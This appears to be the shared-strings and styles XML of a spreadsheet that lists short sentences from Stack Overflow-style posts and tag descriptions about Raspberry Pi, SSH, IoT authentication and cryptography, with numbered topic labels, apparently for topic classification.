    <t>device_id is the ID of the device specified when registering the device.</t>
  </si>
  <si>
    <t>Access your PRi via sshfs.</t>
  </si>
  <si>
    <t>Login username is "ubuntu", password is "ubuntu".</t>
  </si>
  <si>
    <t>Connect your WiFI Shield to the Uno board.</t>
  </si>
  <si>
    <t>All the remote systems connect to samba with the same userid (pi) password.</t>
  </si>
  <si>
    <t>I use the wired Ethernet for SSH to the Intel XDK development system.</t>
  </si>
  <si>
    <t>After you have verified the XBEE link then you can troubleshoot the connection between the XBEE and the Arduino.</t>
  </si>
  <si>
    <t>That is why you get SIGILL when trying to use it.</t>
  </si>
  <si>
    <t>Connect PI via Putty or sshclient(linux).</t>
  </si>
  <si>
    <t>[Cryptosuite] (github.com/wgoulet/Cryptosuite) is an implementation of HMAC-SHA-256 for Arduino.</t>
  </si>
  <si>
    <t>Authenticate each request with a secret key.</t>
  </si>
  <si>
    <t>unpair all devices:</t>
  </si>
  <si>
    <t>You will get this error because you do not have the  permission on your file.</t>
  </si>
  <si>
    <t>You need something like HC-06 with HID firmware on it.</t>
  </si>
  <si>
    <t>I wasn't being asked for my ssh's key passphrase.</t>
  </si>
  <si>
    <t>It now asks for the passphrase.</t>
  </si>
  <si>
    <t>I can obviously just ssh in as well.</t>
  </si>
  <si>
    <t>KeyReport is especially mysterious.</t>
  </si>
  <si>
    <t>Login to the Web-management portal.</t>
  </si>
  <si>
    <t>Another way to do that is mac address registiration.</t>
  </si>
  <si>
    <t>If you done this you will be able to connect via ssh to you raspberry pi.</t>
  </si>
  <si>
    <t>It's up to you to figure out how to restart the ssh service in an optimum way, here.</t>
  </si>
  <si>
    <t>I Try to authenticate against my Azure AD with the WebAccountProvider.</t>
  </si>
  <si>
    <t>Also, anyone who is able to ping the Pi but not SSH, just be patient.</t>
  </si>
  <si>
    <t>does the arduino have an ethernet or wifi shield?</t>
  </si>
  <si>
    <t>You should always connect as
ssh user@host
if you don't have specified user in your ~/.ssh/config.</t>
  </si>
  <si>
    <t>Safari).</t>
  </si>
  <si>
    <t>Activate Device discovery and Device portal.</t>
  </si>
  <si>
    <t>But you do have a permission error, just not where you are thinking.</t>
  </si>
  <si>
    <t>192.168.0.5?secret=2r43REFGWRE34teeswd.</t>
  </si>
  <si>
    <t>Whereas the error in eclipse console was to look for libcrypto.1.0.0.</t>
  </si>
  <si>
    <t>TLS/SSL on esp is not very straightforward, to say the least.</t>
  </si>
  <si>
    <t>Run gammu deamon with parameter -U username.</t>
  </si>
  <si>
    <t>In the AWS console, select the certificate.</t>
  </si>
  <si>
    <t>If you just used a standalone Java program, you could do this:
Java program waits for fingerprint scan.</t>
  </si>
  <si>
    <t>1.Activate log in .my.cnf
Error logging goes to syslog.</t>
  </si>
  <si>
    <t>Using tls_insecure_set() on its own does nothing.</t>
  </si>
  <si>
    <t>I never tried with NFS but I was able to do it with sshfs.</t>
  </si>
  <si>
    <t>Yo can try with  if you want to access via shell.</t>
  </si>
  <si>
    <t>So a dataframe always has a identifier byte at first.</t>
  </si>
  <si>
    <t>So link -lcrypto after -lnetsnmp.</t>
  </si>
  <si>
    <t>[...]
Enable sudo for your Web server.</t>
  </si>
  <si>
    <t>The permissions should look like this:
# ls -l nmap_lan
-r-sr-xr-x.</t>
  </si>
  <si>
    <t>So, just get a firmware from the dev branch and you're all set.</t>
  </si>
  <si>
    <t>Anyway, the raspberry couldn't get internet access.</t>
  </si>
  <si>
    <t>Many thanks to zaph for pointing out that Mcrypt is outdated.</t>
  </si>
  <si>
    <t>Rolling your own crypto?</t>
  </si>
  <si>
    <t>WiringPi does not need root access.</t>
  </si>
  <si>
    <t>Try to recursively amend permissions using -R
That should work.</t>
  </si>
  <si>
    <t>* CRC validation can only be done if backData and backLen are specified.</t>
  </si>
  <si>
    <t>You can ask a device to identify itself right after connecting.</t>
  </si>
  <si>
    <t>But all commands that do a CBC encryption (e.g.</t>
  </si>
  <si>
    <t>The Java key is specified by a string, the Arduino key by an integer array.</t>
  </si>
  <si>
    <t>Firmware on my HM-10 is version 540.</t>
  </si>
  <si>
    <t>Login with root 
and</t>
  </si>
  <si>
    <t>You need to connect to your Pi via SSH.</t>
  </si>
  <si>
    <t>I have verified it on my raspberry pi 2 with IoT Core 14393.</t>
  </si>
  <si>
    <t>If you are still using pi/raspberry as the username and password, change ASAP.</t>
  </si>
  <si>
    <t>or change the accessID/ key?</t>
  </si>
  <si>
    <t>Control meaning you can modify the code so that device can try to reconnect.</t>
  </si>
  <si>
    <t>This particular error is not about permissions.</t>
  </si>
  <si>
    <t>Here is a code sample to attach an IoT policy to a Cognito user id from a Lambda (NodeJS) function.</t>
  </si>
  <si>
    <t>You forgot exit an authentificated PICC.</t>
  </si>
  <si>
    <t>It allows to SSH into the Raspberry Pi.</t>
  </si>
  <si>
    <t>It'll ask you for your Pi's password.</t>
  </si>
  <si>
    <t>Python pseudocode:
Arduino pseudocode:</t>
  </si>
  <si>
    <t>This command should work in case you can authenticate to the network share from Raspberry Pi.</t>
  </si>
  <si>
    <t>Be sure pch is valid by printing it.</t>
  </si>
  <si>
    <t>PHP runs with apache user permissions.</t>
  </si>
  <si>
    <t>OAuth 2.0 password profile .</t>
  </si>
  <si>
    <t>Using WiFi to connect to RPi
SSH to RPi.</t>
  </si>
  <si>
    <t>Have you tried to access your BLE device with gatttool?</t>
  </si>
  <si>
    <t>Then you need to flash the new firmware to your devkit.</t>
  </si>
  <si>
    <t>You can disable eth0 by using
.</t>
  </si>
  <si>
    <t>Also, the other option you have is, ssh to it.</t>
  </si>
  <si>
    <t>After ssh, setup vnc on your pi.</t>
  </si>
  <si>
    <t>When I'm on local network I can not access it with external IP.</t>
  </si>
  <si>
    <t>:)
You can store the passcode in your Arduino's EEPROM.</t>
  </si>
  <si>
    <t>Than you can connect with SSH.</t>
  </si>
  <si>
    <t>Shopify has a Python module, shopifyapi that allows you to register your webhook.</t>
  </si>
  <si>
    <t>The SwiftPM repo contains an example script on how to do this for Intel-macOS to Intel-Ubuntu.</t>
  </si>
  <si>
    <t>See here: Is there a code obfuscator for PHP?</t>
  </si>
  <si>
    <t>But ssh should not need as much.</t>
  </si>
  <si>
    <t>You will get a neat configuration file with a JSON that you can use to configure the STA SSID and Password.</t>
  </si>
  <si>
    <t>If I use SSH and try to run the script, it works .</t>
  </si>
  <si>
    <t>I have some ways for you:
netstat -tn | grep 22 to ssh connection to/from your pi.</t>
  </si>
  <si>
    <t>See Check WiFi101 Firmware Version and Firmware and certificates Updater.</t>
  </si>
  <si>
    <t>Update: update XAUTHORITY=/home/pi/.Xauthority may also help</t>
  </si>
  <si>
    <t>You may not have the necessary permissions to access the file Using child_process</t>
  </si>
  <si>
    <t>The problem was there was no credential in the Cognito Cache.</t>
  </si>
  <si>
    <t>That happend because I don't have de key to decrypt it.</t>
  </si>
  <si>
    <t>When you connect to GND, it will register 0.</t>
  </si>
  <si>
    <t>Your htaccess file is invalid.</t>
  </si>
  <si>
    <t>Maybe the problem is the "https" protocol you're using.</t>
  </si>
  <si>
    <t>You can use SSH as a workaround.</t>
  </si>
  <si>
    <t>If you user Key management then Service Name would be kms.</t>
  </si>
  <si>
    <t>WolfSSL: Error -313</t>
  </si>
  <si>
    <t>just SSH or Powershell into the device, run nanordpserver.exe and try again.</t>
  </si>
  <si>
    <t>You will then access it by using its name and not its IP.</t>
  </si>
  <si>
    <t>so i have to set the plugin to mysql_native_password.</t>
  </si>
  <si>
    <t>Login as user "pi" (and change to user "root" with "sudo su").</t>
  </si>
  <si>
    <t>On the Android device you first determine the ip of the device itself.</t>
  </si>
  <si>
    <t>I figured out that the  files need more permissions.</t>
  </si>
  <si>
    <t>And to get this kind of permission the device need to be booted once.</t>
  </si>
  <si>
    <t>https://firebase.google.com/docs/auth/android/anonymous-auth.</t>
  </si>
  <si>
    <t>The user Apache runs as doesn't have permission to access whatever file you are trying to access.</t>
  </si>
  <si>
    <t>Then use "ssh -X" from the library computer.</t>
  </si>
  <si>
    <t>Iterative through the list, strip out the certificate id and call DescribeCertificate, with the certificate id as parameter.</t>
  </si>
  <si>
    <t>Don't skim on the security and access rights to your API.</t>
  </si>
  <si>
    <t>The password for the OS's root is used for .</t>
  </si>
  <si>
    <t>So from the example data above, you might have:
userID: 0x19, userPass: 0x36, userData: 0x4169.</t>
  </si>
  <si>
    <t>You can get device ID from :</t>
  </si>
  <si>
    <t>Your CWD is usualy the directory containing your .py file.</t>
  </si>
  <si>
    <t>The code by nPn works in some user agents (Chrome/Firfox/curl/wget on macOS) but not in others (Safari on macOS &amp; iOS, Firefox Klar on iOS).</t>
  </si>
  <si>
    <t>But with this command I get it to run:
With sudo adduser pi video, logout and login, I do not need sudo for the command.</t>
  </si>
  <si>
    <t>Most likely it is still a permissions error.</t>
  </si>
  <si>
    <t>You can use AWSIoTKeyChain in the AWS IoT SDK for iOS.</t>
  </si>
  <si>
    <t>If so you will have to set your display to the ip of that computer your ssh'ing from.</t>
  </si>
  <si>
    <t>If your Nano is not genuine (i.e.</t>
  </si>
  <si>
    <t>I used keycode , also known as KEY_WAKEUP.</t>
  </si>
  <si>
    <t>So no need to use anonymous auth at all.</t>
  </si>
  <si>
    <t>Have you considered an Intel NUC?</t>
  </si>
  <si>
    <t>Indeed, firmware OTA is not available yet.</t>
  </si>
  <si>
    <t>!\nI AM PYTHON READY TO TALK WITH ARDUINO\nINSERT 
PASSWORD PLEASE.')</t>
  </si>
  <si>
    <t>There is  for NVIDIA and msdk for Intel at least.</t>
  </si>
  <si>
    <t>The doorbell hack example is just stupid.</t>
  </si>
  <si>
    <t>Here is a tip on how to use it with Authlib: https://blog.authlib.org/2018/authlib-for-gspread</t>
  </si>
  <si>
    <t>Always use an SSL cert or IPsec Tunnel for the Proxy or VPN connection.</t>
  </si>
  <si>
    <t>Should it be:
Azure Baltimore certificate first??</t>
  </si>
  <si>
    <t>I was getting hung up on the python configuration of the credential.json file.</t>
  </si>
  <si>
    <t>For the password field, use a SAS token.</t>
  </si>
  <si>
    <t>You can use Device Explorer to get the SAS token.</t>
  </si>
  <si>
    <t>From the error log, it seems that the module has no permission to access device/gpio.</t>
  </si>
  <si>
    <t>The correct way is to login to my-sql with sudo privilege.</t>
  </si>
  <si>
    <t>Have you tried as root under Linux sudo/su 'ssh -v -p 22 "username"@"raspberry"'?</t>
  </si>
  <si>
    <t>-v = verbose and show you what ssh does.</t>
  </si>
  <si>
    <t>This can also be run over SSH or as a local command.</t>
  </si>
  <si>
    <t>If you're using Cognito for your AWS IoT authentication, then the below will definitely help.</t>
  </si>
  <si>
    <t>authentication).</t>
  </si>
  <si>
    <t>Because the communication between your gateway and AWS IoT broker should be secure.</t>
  </si>
  <si>
    <t>The IP may be in use by another device that did not have adb.</t>
  </si>
  <si>
    <t>The safe range in NXP is from 2.5V to 3.6V.</t>
  </si>
  <si>
    <t>No need reboot for password change.</t>
  </si>
  <si>
    <t>On the decoder side, decode base64, and decrypt with the same key and IV.</t>
  </si>
  <si>
    <t>This authentication method is not used very often.</t>
  </si>
  <si>
    <t>See what permissions are there</t>
  </si>
  <si>
    <t>this is the code with protection against sql injection:</t>
  </si>
  <si>
    <t>to you can use ssh -X to connect and run the application at the server.</t>
  </si>
  <si>
    <t>It's an SSH client for Python.</t>
  </si>
  <si>
    <t>To get rid of the 401 error: Use MSFT Baltimore certificate in the code.</t>
  </si>
  <si>
    <t>Next we need to generate a SAS token.</t>
  </si>
  <si>
    <t>This is quite hackish and error-prone.</t>
  </si>
  <si>
    <t>You have a watchdog timeout reset.</t>
  </si>
  <si>
    <t>The /dev/ttyUSB0 permission was ok, but not the timeout.</t>
  </si>
  <si>
    <t>The JSON key you had to generate is to authenticate with the API service.</t>
  </si>
  <si>
    <t>I did log out, then it asked for password, so you might try that.</t>
  </si>
  <si>
    <t>You don't need to SSH on the target for this.</t>
  </si>
  <si>
    <t>Try this out
Then install scrypt</t>
  </si>
  <si>
    <t>Pushbullet uses SSL certificates with SNI.</t>
  </si>
  <si>
    <t>Firmware is OK,  was incorrect.</t>
  </si>
  <si>
    <t>The Baltimore certificate is the root certificate from which the IoT hub certificate is a descendent.</t>
  </si>
  <si>
    <t>Just DON'T hardcode the IP address.</t>
  </si>
  <si>
    <t>httpsPort should be 443.</t>
  </si>
  <si>
    <t>as the password.</t>
  </si>
  <si>
    <t>Of course, some RS-232 also have acknowledgments like the BSC protocol.</t>
  </si>
  <si>
    <t>The problem was the authentication protocol  of the network.</t>
  </si>
  <si>
    <t>Don't use the "777" mode on the /dev/vchiq because it's not secure!</t>
  </si>
  <si>
    <t>is a define for mbedtls_aes_crypt_ctr.</t>
  </si>
  <si>
    <t>You can use  command to confirm the port.</t>
  </si>
  <si>
    <t>We can also say that you don't need to store the username and password, you can just store an hash of the password and username.</t>
  </si>
  <si>
    <t>not without resorting to a jailbroken device.</t>
  </si>
  <si>
    <t>Use sts-securitytokenservice instead.</t>
  </si>
  <si>
    <t>Apple Inc. uses keychains as password management system in Mac OS and iOS.</t>
  </si>
  <si>
    <t>Software and hardware authentication from SafeNet.</t>
  </si>
  <si>
    <t>SYSENTER is a companion instruction to SYSEXIT.</t>
  </si>
  <si>
    <t>A unix command that prints the user's login name.</t>
  </si>
  <si>
    <t>JavaScript implementation of the OAuth protocol.</t>
  </si>
  <si>
    <t>Intel MPI Library is an MPI implementation by Intel Corporation.</t>
  </si>
  <si>
    <t>SecureElement in NFC Devices</t>
  </si>
  <si>
    <t>Is the URL where a user is redirected after being authenticated.</t>
  </si>
  <si>
    <t>Google APIs use the OAuth 2.0 protocol for authentication and authorization.</t>
  </si>
  <si>
    <t>Authenticode.</t>
  </si>
  <si>
    <t>The remainder of the IP address (host id) identifies devices that are connected to this network.</t>
  </si>
  <si>
    <t>AppArmor is a Linux Security Module (LSM) for Linux kernels.</t>
  </si>
  <si>
    <t>Kerberos support for Spring Security.</t>
  </si>
  <si>
    <t>WAFFLE is a Windows authentication framework for Java and C#.</t>
  </si>
  <si>
    <t>Keystone is the identity service used by OpenStack for authentication.</t>
  </si>
  <si>
    <t>The corresponding library for iOS is RNCryptor.</t>
  </si>
  <si>
    <t>The User ID might or might not coincide with the user name.</t>
  </si>
  <si>
    <t>Authentication middleware for Node.js.</t>
  </si>
  <si>
    <t>A shell environment to the Git server which provide a SSH access.</t>
  </si>
  <si>
    <t>Unique ID provide by Apple Inc for login to use their services.</t>
  </si>
  <si>
    <t>It is a network boot firmware.</t>
  </si>
  <si>
    <t>A javascript version of php's mcrypt</t>
  </si>
  <si>
    <t>Well known KDF's are crypt, bcrypt, scrypt, PBKDF2 and HKDF.</t>
  </si>
  <si>
    <t>J2SSH is an object-orientated Java implementation of the SSH version 2 protocol.</t>
  </si>
  <si>
    <t>User Login functionality in WordPress</t>
  </si>
  <si>
    <t>You want [html5-keygen] or [ssh-keygen] instead.</t>
  </si>
  <si>
    <t>It does not provide any encryption or confidentiality by itself.</t>
  </si>
  <si>
    <t>Use google-auth and oauthlib instead.</t>
  </si>
  <si>
    <t>Hydra is a network logon password cracker.</t>
  </si>
  <si>
    <t>Facebook OAuth2 Strategy for OmniAuth.</t>
  </si>
  <si>
    <t>Passport.js is authentication middleware for Node.js.</t>
  </si>
  <si>
    <t>Use "antivirus" for antivirus.</t>
  </si>
  <si>
    <t>halts and asks for a password from a user.</t>
  </si>
  <si>
    <t>sshpass is the Non-interactive ssh password auth OpenSource project.</t>
  </si>
  <si>
    <t>OWASP Zed Attack Proxy (ZAP)</t>
  </si>
  <si>
    <t>Passport JS is authentication middleware for Node.js</t>
  </si>
  <si>
    <t>Lets you authenticate using Facebook in your Node.js applications</t>
  </si>
  <si>
    <t>Zombie tag, please don't use.</t>
  </si>
  <si>
    <t>LinkedIn OAuth2 strategy for OmniAuth.</t>
  </si>
  <si>
    <t>An express middleware to have simple NTLM-authentication in node.js.</t>
  </si>
  <si>
    <t>An Access Control Service of Google</t>
  </si>
  <si>
    <t>The MESI protocol (known also as Illinois protocol) is a cache coherence and memory coherence protocol.</t>
  </si>
  <si>
    <t>For use with the OAuth protocol and the Google API.</t>
  </si>
  <si>
    <t>LeakSanitizer (LSan) is a memory leak detector for GCC and Clang.</t>
  </si>
  <si>
    <t>Grant is OAuth middleware for Express, Koa and Hapi web frameworks for NodeJS.</t>
  </si>
  <si>
    <t>Login with Amazon is Amazon's identity provider.</t>
  </si>
  <si>
    <t>question about svn+ssh protocol used to access svn over ssh</t>
  </si>
  <si>
    <t>Amazon EC2 Security Groups</t>
  </si>
  <si>
    <t>security).</t>
  </si>
  <si>
    <t>Yahoo APIs use the OAuth protocol for authorization and authentication.</t>
  </si>
  <si>
    <t>Multi-provider authentication framework for PHP</t>
  </si>
  <si>
    <t>It works with both OAuth2 and XACML protocols</t>
  </si>
  <si>
    <t>Laravel Passport is a native OAuth 2 server for Laravel apps.</t>
  </si>
  <si>
    <t>Used for Cache Busting.</t>
  </si>
  <si>
    <t>Internal authentication between members of a replica set can be done using keyfiles or x.509 certificates.</t>
  </si>
  <si>
    <t>Configure proxy middleware with ease for connect, express, browser-sync and many more.</t>
  </si>
  <si>
    <t>Apache Atlas is a data governance and metadata framework for Hadoop.</t>
  </si>
  <si>
    <t>Before you ask a question, validate your JSON using a JSON validator such as JSONLint (https://jsonlint.com).</t>
  </si>
  <si>
    <t>For Code Access Security (Microsoft .NET) use the [code-access-security] tag</t>
  </si>
  <si>
    <t>The Z shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a powerful command interpreter for shell scripting.</t>
  </si>
  <si>
    <t>Contour is a Kubernetes ingress controller for Lyft's Envoy proxy.</t>
  </si>
  <si>
    <t>It is also used by Microsoft Access.</t>
  </si>
  <si>
    <t>a business intelligence server integrated with SharePoint.</t>
  </si>
  <si>
    <t>Paramiko is a Python module that implements the SSH2 protocol.</t>
  </si>
  <si>
    <t>network access denied by access control list (ACL)</t>
  </si>
  <si>
    <t>The Dynamic Host Configuration Protocol (DHCP) is an auto configuration protocol used on IP networks.</t>
  </si>
  <si>
    <t>Safari is Apple's web browser, the default browser on macOS and iOS.</t>
  </si>
  <si>
    <t>TRON - blockchain platform.</t>
  </si>
  <si>
    <t>If you have a Seller Central account, you're considered a marketplace or third-party seller.</t>
  </si>
  <si>
    <t>Google AuthSub authentication for Google endpoints.</t>
  </si>
  <si>
    <t>LiveConnect allows ECMAscript code running Mozilla's Rhino interpreter to access Java code in a transparent way.</t>
  </si>
  <si>
    <t>sfGuard is a Symfony plugin that implements a user management and login system for an application.</t>
  </si>
  <si>
    <t>BusinessObjects is a business-intelligence suite from SAP.</t>
  </si>
  <si>
    <t>Android licensing verification library</t>
  </si>
  <si>
    <t>Apache Rampart - Axis2 Security Module</t>
  </si>
  <si>
    <t>It is different from "file permissions," which are the access permissions users have for files in a file system.</t>
  </si>
  <si>
    <t>Often used to notate Unix permissions.</t>
  </si>
  <si>
    <t>django-csrf is the Cross Site Request Forgery (CSRF) protection middleware for Django.</t>
  </si>
  <si>
    <t>xVal is a validation framework for ASP.NET MVC applications.</t>
  </si>
  <si>
    <t>One QNetworkAccessManager should be enough for the whole Qt application.</t>
  </si>
  <si>
    <t>Keychain is Apple Inc.'s password management system in Mac OS and iOS.</t>
  </si>
  <si>
    <t>The command line equivalent of Keychain Access is /usr/bin/security.</t>
  </si>
  <si>
    <t>SYSENTER is a 
companion instruction to SYSEXIT.</t>
  </si>
  <si>
    <t>Network Identifier : Defines the external network to which the Gateway GPRS Support Node (GGSN) is connected.</t>
  </si>
  <si>
    <t>An x.509 certificate is an example of a cryptographic credential.</t>
  </si>
  <si>
    <t>Browser Detection is Bad by Chris Coyier</t>
  </si>
  <si>
    <t>AppCmd.exe is the command line utility to access the configuration of Microsoft IIS 7.</t>
  </si>
  <si>
    <t>It is the default SSH toolset for most *nix systems.</t>
  </si>
  <si>
    <t>jsOAuth is  implementation of the OAuth protocol.</t>
  </si>
  <si>
    <t>http://msdn.microsoft.com/en-us/library/system.security.permissions.securityaction.aspx</t>
  </si>
  <si>
    <t>The bundle use the default security system of Symfony 2.</t>
  </si>
  <si>
    <t>Application Verifier on Microsoft Download Center
Application Verifier on Microsoft Dev Center</t>
  </si>
  <si>
    <t>On a UNIX-like system this will query /dev/urandom, and on Windows it will use CryptGenRandom.</t>
  </si>
  <si>
    <t>Fuseki
Configuration
Fuseki
Security
Fuseki
Logging</t>
  </si>
  <si>
    <t xml:space="preserve"> is a pseudocolumn available in Oracle database.</t>
  </si>
  <si>
    <t>It supplements the security functionality of the default JDK.</t>
  </si>
  <si>
    <t>See also multi-factor and the Security.StackExchange multi-factor tag.</t>
  </si>
  <si>
    <t>Spring Security Kerberos - Kerberos support for Spring Security.</t>
  </si>
  <si>
    <t>See also the Wikipedia article on Hijax.</t>
  </si>
  <si>
    <t>Confidentiality is the act of only allowing those a user wishes to see the data to actually see it.</t>
  </si>
  <si>
    <t>FILTER_VALIDATE_EMAIL, FILTER_VALIDATE_REGEXP, FILTER_VALIDATE_IP etc.</t>
  </si>
  <si>
    <t>Each of these flows use the OAuth 2.0 standard.</t>
  </si>
  <si>
    <t>See also:
django-auth</t>
  </si>
  <si>
    <t>On the remote computer the SFTP subsystem of SSH is used.</t>
  </si>
  <si>
    <t>(That's the Intel386 or i386 System V psABI.</t>
  </si>
  <si>
    <t>FHSTwitterEngine can:
Authenicate using OAuth and/or xAuth.</t>
  </si>
  <si>
    <t>JS-Mcrypt</t>
  </si>
  <si>
    <t>ASP.NET Web Application Security</t>
  </si>
  <si>
    <t>On Linux, those are $XDG_CONFIG_HOME/ltrace,
       $HOME/.ltrace, X/ltrace for each X in $XDG_CONFIG_DIRS and
       /usr/share/ltrace.</t>
  </si>
  <si>
    <t>We recommend you use google-auth and oauthlib.</t>
  </si>
  <si>
    <t>If there are no ACEs in the DACL, the system does not allow access to anyone.</t>
  </si>
  <si>
    <t>Safari is also a native browser for iOS.</t>
  </si>
  <si>
    <t>Naked JSON, just as it was mean to be.</t>
  </si>
  <si>
    <t>Hack Ruby, Go, Java, NodeJS, PHP, C, and Python.</t>
  </si>
  <si>
    <t>Play with MySQL, Mongo, and enjoy root access.</t>
  </si>
  <si>
    <t>to authenticated users.</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Encrypting_File_System</t>
  </si>
  <si>
    <t>Permissions are how you ask someone if you can access that data.</t>
  </si>
  <si>
    <t>A JPasswordField to input the password.</t>
  </si>
  <si>
    <t>https://github.com/xamarin/Xamarin.Auth</t>
  </si>
  <si>
    <t>The network monitoring service use both WMI and ADSI.</t>
  </si>
  <si>
    <t>Safeguard mobile security at the device, application, data and network layer.</t>
  </si>
  <si>
    <t>SPF vs Sender ID
SPF and Sender ID are not the same.</t>
  </si>
  <si>
    <t>It implements IEEE 802.11 access point management, IEEE 802.1X/WPA/WPA2/EAP Authenticators, RADIUS client, EAP server, and RADIUS authentication server.</t>
  </si>
  <si>
    <t>A hackable text editor for the 21st Century.</t>
  </si>
  <si>
    <t>They are anonymous only.</t>
  </si>
  <si>
    <t>OAuth is a protocol for authentication and authorization.</t>
  </si>
  <si>
    <t>We encourage you to migrate to OAuth 2.0 as
  soon as possible.</t>
  </si>
  <si>
    <t>mod_auth_form is an apache module up to 2.3.</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Transport_Layer_Security#TLS_1.2</t>
  </si>
  <si>
    <t>https://en.wikipedia.org/wiki/Directive_on_Privacy_and_Electronic_Communications</t>
  </si>
  <si>
    <t>It provides the RBAC functionality through the authManager application component.</t>
  </si>
  <si>
    <t>Microsoft Graph is the gateway to data and intelligence in Microsoft 365.</t>
  </si>
  <si>
    <t>Amazon EC2 Security Groups for EC2.</t>
  </si>
  <si>
    <t>Application Security on Cloud is a service in Bluemix for application security scan.</t>
  </si>
  <si>
    <t>What are Runtime Permissions?</t>
  </si>
  <si>
    <t>Is PHP vulnerable?</t>
  </si>
  <si>
    <t>When asking a JavaScript question, you should:
Debug your JavaScript code (see Creativebloq, MDN, Google, &amp; MSDN).</t>
  </si>
  <si>
    <t>Fingerprintjs2 is the successor of Fingerprintjs.</t>
  </si>
  <si>
    <t>), ipsec, dnssec, and more.</t>
  </si>
  <si>
    <t>RSA Security, Inc. is also the name of a security firm.</t>
  </si>
  <si>
    <t>See also two-factor-authentication and the Security.StackExchange multi-factor tag.</t>
  </si>
  <si>
    <t>t authorize --display-uri</t>
  </si>
  <si>
    <t>See the documentation by Twitter about XAuth for more information.</t>
  </si>
  <si>
    <t>gulp-real-favicon Generate a multiplatform favicon with RealFaviconGenerator
react-native-fbsdk For Facebook Login in React Native.</t>
  </si>
  <si>
    <t>ProGuard is a Java class file shrinker, optimizer, obfuscator, and preverifier.</t>
  </si>
  <si>
    <t>Support for PSSH in fMP4 moof atoms.</t>
  </si>
  <si>
    <t>It does not provide protection against XSS.</t>
  </si>
  <si>
    <t>HMAC-SHA-256, HMAC-SHA-512, HMAC-SHA-1, etc.</t>
  </si>
  <si>
    <t>It also allows users to browse the Ethereum blockchain from a standard browser.</t>
  </si>
  <si>
    <t>cflogin is a container for user login and authentication code.</t>
  </si>
  <si>
    <t>Computation Intelligence and AI in Games, IEEE Transactions on, Vol.</t>
  </si>
  <si>
    <t>https://github.com/google/sanitizers/wiki/AddressSanitizer</t>
  </si>
  <si>
    <t>See also: encryption, rsa, aes, sha</t>
  </si>
  <si>
    <t>JAR File Manifest Attributes for Security.</t>
  </si>
  <si>
    <t>The Z shell can be used as an interactive login shell and as a powerful command interpreter for shell scripting.</t>
  </si>
  <si>
    <t>Trying to echo the password to ssh does not work.</t>
  </si>
  <si>
    <t>For these questions, use the krypton-toolkit tag.</t>
  </si>
  <si>
    <t>Resources
Authentication - Wikipedia</t>
  </si>
  <si>
    <t>Root password is 1234.</t>
  </si>
  <si>
    <t>ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier.</t>
  </si>
  <si>
    <t>For example: msgstore-2019-01-05.1.db.crypt12.</t>
  </si>
  <si>
    <t>DatastoreService Keys are untyped and
error-prone.</t>
  </si>
  <si>
    <t>Security permissions.</t>
  </si>
  <si>
    <t>X.509: Generators and parsers for V1 and V3 certificates, V2 CRLs and attribute certificates.</t>
  </si>
  <si>
    <t>protocol is the native protocol used by the uWSGI server.</t>
  </si>
  <si>
    <t>Often the decompiled code will resemble obfuscated code.</t>
  </si>
  <si>
    <t>The public bugtracker.</t>
  </si>
  <si>
    <t>Community forum (free, but you need to login).</t>
  </si>
  <si>
    <t>Authorization is distinct from authentication but the two are often used together.</t>
  </si>
  <si>
    <t>Rampart is the security module of Axis2.</t>
  </si>
  <si>
    <t>Password Security and Encryption</t>
  </si>
  <si>
    <t>See also:
Twitter Authentication &amp; Autorization
oauth
twitter
OAuth FAQ</t>
  </si>
  <si>
    <t>The replication itself should be transparent to an external user.</t>
  </si>
  <si>
    <t>For password brute-forcing.</t>
  </si>
  <si>
    <t>On Linux and Mac OS X, it is known as Intel Fortran.</t>
  </si>
  <si>
    <t>More about Google Authenticator
Google Authenticator on Google Play
Google Authenticator on App Store</t>
  </si>
  <si>
    <t>Topic-1</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>Topic-2</t>
  </si>
  <si>
    <t>Topic-3</t>
  </si>
  <si>
    <t>Topic-4</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t>Topic-5</t>
  </si>
  <si>
    <t>Topic-6</t>
  </si>
  <si>
    <t>Topic-7</t>
  </si>
  <si>
    <t>Topic-8</t>
  </si>
  <si>
    <t>Hardware</t>
  </si>
  <si>
    <t>Topic-9</t>
  </si>
  <si>
    <t>Topic-10</t>
  </si>
  <si>
    <t>Topic-11</t>
  </si>
  <si>
    <t>Topic-12</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</si>
</sst>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Arial"/>
    </font>
    <font>
      <b/>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color theme="10"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="10"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF0000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0" fontId="3" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
